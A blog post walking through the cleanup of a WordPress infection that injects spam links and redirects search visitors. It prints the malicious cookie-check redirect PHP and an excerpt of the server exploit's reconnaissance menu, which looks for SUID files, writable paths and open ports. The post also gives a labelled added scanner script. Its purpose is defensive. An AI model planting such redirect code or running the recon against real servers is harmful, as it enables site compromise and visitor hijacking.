Virus in the blogosphere… but what did you have against me?!

Last month we received virus warnings about the blog from several visitors. Initially I ignored the warnings, because I had a fairly good antivirus installed (Kaspersky AV 2009) and, in all the time I have run the blog, I never received a virus alert (a long time ago I saw something suspicious that disappeared at the first refresh, and that was all).
Slowly, visitor traffic started to show large variations, after which lately it has fallen steadily, and more and more people began telling me that stealthsettings.com was infected. Yesterday I received from someone a screenshot taken when their antivirus blocked a script on stealthsettings.com: Trojan-Clicker.HTML.IFrame.gr. It was convincing enough for me to search through all the sources. The first idea that came to mind was to upgrade to the latest WordPress (2.5.1), but not before deleting all the files of the old WordPress script and making a backup of the database. This procedure didn't work, and it would probably have taken me a long time to figure out where the problem was if Eugen, in a discussion over coffee, hadn't told me he had found a link on Google that would be good to look at.
MyDigitalLife.info published an article entitled "WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites". That was the end of the thread I needed.
It is about a cookie-based WordPress exploit, which I think is very complex and done by the book. It is clever enough to perform SQL injection in the blog's database, to create an invisible user that a simple routine check in Dashboard -> Users won't reveal, to check the server for "writable" folders and files (chmod 777), and to search for and execute files with group or root privileges. I do not know the name of the exploit, and I see there are few articles written about it, despite the fact that many blogs are infected, including in Romania. Ok... I will try to explain some generalities about this virus.

What is the virus?

First, it inserts into the source of the blog's pages links that are invisible to visitors but visible and indexable by search engines, especially Google. In this way it transfers PageRank to sites chosen by the attacker. Second, it inserts another block of code that redirects visitors coming from Google, Live, Yahoo, ... or an RSS reader who do not have the site's cookie. An antivirus detects this redirect as Trojan-Clicker.HTML.

Symptoms:

A massive decrease in visitor traffic, especially on blogs where most visitors come from Google.

Identification: (this is where the problem gets complicated for those who don't know much about phpMyAdmin, PHP and Linux)

CAREFUL!!! First make a backup of the DATABASE!!!

1. Check the source files index.php, header.php and footer.php of the blog theme and see if there is code that uses base64 encoding or contains "if($ser=="1" && sizeof($_COOKIE)==0)" in the form:

<?php
// Visitors arriving from a search engine without any cookie set are redirected
// to the attacker's domain, which is hidden as a base64 string.
$seref = array("google","msn","live","altavista",
    "ask","yahoo","aol","cnn","weather","alexa");
$ser = 0;
foreach ($seref as $ref)
    if (strpos(strtolower($_SERVER['HTTP_REFERER']), $ref) !== false) { $ser = "1"; break; }
if ($ser == "1" && sizeof($_COOKIE) == 0) {
    header("Location: http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
    exit;
}
?>

... or something similar. Delete this code!

[Screenshot: the code in index.php]

In the screenshot above I accidentally also selected " ". That code must remain.

2. Use phpMyAdmin and go to the database table wp_users, where you check whether there is a user created on 0000-00-00 00:00:00 (possibly with "WordPress" in the user_login field). Write down this user's ID (the ID field) and then delete it.

[Screenshot: the fake user in wp_users]

* The green line is the one removed, with its ID noted. In sleepy's case the ID was 8.

3. Go to the table wp_usermeta, where you have to find and wipe the rows for that ID (the rows where the deleted ID appears in the user_id field).

4. In the table wp_options, go to active_plugins and see which suspicious plugin is enabled. It can use endings like _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc.: combinations of image-like extensions with _old and _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Delete this plugin, then go to the blog -> Dashboard -> Plugins, where you deactivate and reactivate any plugin.

[Screenshot: how the virus appears in active_plugins]

Follow the path indicated in active_plugins over FTP or SSH and delete the file from the server.

5. Also in phpMyAdmin, in the table wp_options, find and delete the row containing "rss_f541b3abd05e7962fcab37737f40fad8" and also the one containing "internal_links_cache".
In internal_links_cache the hacker keeps the encrypted spam links that show up in the blog's code next to Google AdSense.

6. It is recommended to change the blog's login password and remove all suspicious users. Upgrade to the latest version of WordPress and set the blog to no longer allow new users to register. Nothing is lost... people can still comment unregistered.

Above I tried to explain a bit what to do in such a situation to clean the blog of this virus. The problem is much more serious than it seems and is nowhere near solved, because security vulnerabilities of the web server hosting the blog are being used.

As a first security measure, with SSH access, do some checking on the server to see if there are files like *_new* and *_old* with the endings .giff, .jpeg, .pngg, .jpgg. These files should be deleted. If we rename a file, for example top_right_old.giff to top_right_old.php, we see that the file is exactly the server exploit code.

Some useful instructions for checking, cleaning and securing the server (via SSH).

1. cd /tmp and check for folders like tmpVFlma or other similar combinations of names, and delete them. See the screenshot below, two such folders in my case:

[Screenshot: suspicious tmp folders on the server]

rm -rf foldername

2. Check and eliminate (change the chmod) as far as possible the folders with the attributes chmod 777

find all writable files in the current dir: find . -type f -perm -2 -ls
find all writable directories in the current dir: find . -type d -perm -2 -ls
find all writable directories and files in the current dir: find . -perm -2 -ls

3. Look for suspicious files on the server.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*.giff"
find . -name "*.pngg"

4. CAREFUL!!! Files with the SUID and SGID bits set. These files execute with the privileges of the owning user (or group) or of root, not those of the user running them, so if they have security issues they can compromise root. If you do not use files with the SUID and SGID bits, perform "chmod 0" on them or uninstall the package containing them.
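The checks from steps 2 to 4 above, together with the theme-file signature from the Identification section, collected into one script. This is an added example and not code from the original post: the directory layout, file names and the base64 value (which simply decodes to example.com) are a constructed fixture.

```shell
#!/bin/sh
# Added example (not from the original post): scan a WordPress tree for the
# indicators described above. All paths and the fixture below are constructed.

# 1. Theme/core PHP files that decode base64 AND test for visitors without cookies.
find_redirect_code() {
    find "$1" -type f -name '*.php' -exec grep -lE 'base64_decode' {} + 2>/dev/null |
    while read -r f; do
        grep -qE 'sizeof\(\$_COOKIE\) *== *0' "$f" && echo "$f"
    done
}

# 2. Scripts disguised as images: *_old.* / *_new.* with doubled-letter extensions.
find_fake_images() {
    find "$1" -type f \( -name '*_old.*' -o -name '*_new.*' \) \
        \( -name '*.giff' -o -name '*.pngg' -o -name '*.jpgg' -o -name '*.php.*' \)
}

# 3. World-writable files and directories (the chmod 777 problem).
find_world_writable() { find "$1" -perm -0002; }
# 4. Files with the SUID or SGID bit set.
find_suid_sgid() { find "$1" -type f \( -perm -04000 -o -perm -02000 \); }

# Run every check and print each finding once.
scan_wp_root() {
    { find_redirect_code "$1"; find_fake_images "$1"
      find_world_writable "$1"; find_suid_sgid "$1"; } | sort -u
}

# Constructed fixture: one clean theme file plus one instance of each problem.
make_fixture() {
    umask 022
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/t" "$d/wp-content/plugins" "$d/wp-content/uploads"
    printf '<?php get_header(); wp_head(); ?>\n' > "$d/wp-content/themes/t/index.php"
    # Redirect signature; ZXhhbXBsZS5jb20= is only base64("example.com").
    printf '<?php if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("ZXhhbXBsZS5jb20=")."/"); exit; } ?>\n' \
        > "$d/wp-content/themes/t/header.php"
    printf '<?php /* placeholder for a script hidden as an image */ ?>\n' > "$d/wp-content/plugins/top_right_old.giff"
    chmod 777 "$d/wp-content/uploads"
    printf '#!/bin/sh\n' > "$d/suid_helper"; chmod 4755 "$d/suid_helper"
    echo "$d"
}

# Usage: sh scan.sh /path/to/wordpress ; with no argument the fixture is scanned.
if [ $# -eq 0 ]; then
    demo=$(make_fixture); scan_wp_root "$demo"; rm -rf "$demo"
else
    scan_wp_root "$1"
fi
```

Every hit still needs a human look: a world-writable uploads directory may be intentional, while a .php.giff file under plugins never is.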

The exploit code contains, somewhere in its source, ...:

// Excerpt: the exploit picks its reconnaissance commands according to the host OS.
if(!$safe_mode){
    if($os_type == 'nix'){
        // Unix-like host: read the kernel name/version and the current user.
        $os .= execute('sysctl -n kern.ostype');
        $os .= execute('sysctl -n kern.osrelease');
        $os .= execute('sysctl -n kernel.ostype');
        $os .= execute('sysctl -n kernel.osrelease');
        if(empty($user)) $user = execute('id');
        // Menu of commands looking for SUID/SGID files, writable paths and open ports.
        $aliases = array(
            '' => '',
            'find suid files'=>'find / -type f -perm -04000 -ls',
            'find sgid files'=>'find / -type f -perm -02000 -ls',
            'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
            'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
            'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
            'show opened ports'=>'netstat -an | grep -i listen',
        );
    }else{
        // Windows host.
        $os_name .= execute('ver');
        $user .= execute('echo %username%');
        $aliases = array(
            '' => '',
            'show runing services' => 'net start',
            'show process list' => 'tasklist'
        );
    }
}

This is how it finds the security breaches: open ports, "writable" directories, and files that execute with group or root privileges.

Back with more ...

Some infected blogs... the list goes on... a lot.

You can check whether a blog is infected using the Google search engine. Copy & paste:

site:www.blegoo.com buy

Good night and good work ;) Soon, I think, Eugen will come with news on prevezibil.imprevizibil.com.

brb :)

ATTENTION! Changing the WordPress theme or upgrading to WordPress 2.5.1 is NOT a solution for getting rid of this virus.

Passionate about technology, I enjoy writing on StealthSettings.com since 2006. I have a rich experience in operating systems: macOS, Windows, and Linux, as well as in programming languages and blogging platforms (WordPress) and for online stores (WooCommerce, Magento, PrestaShop).
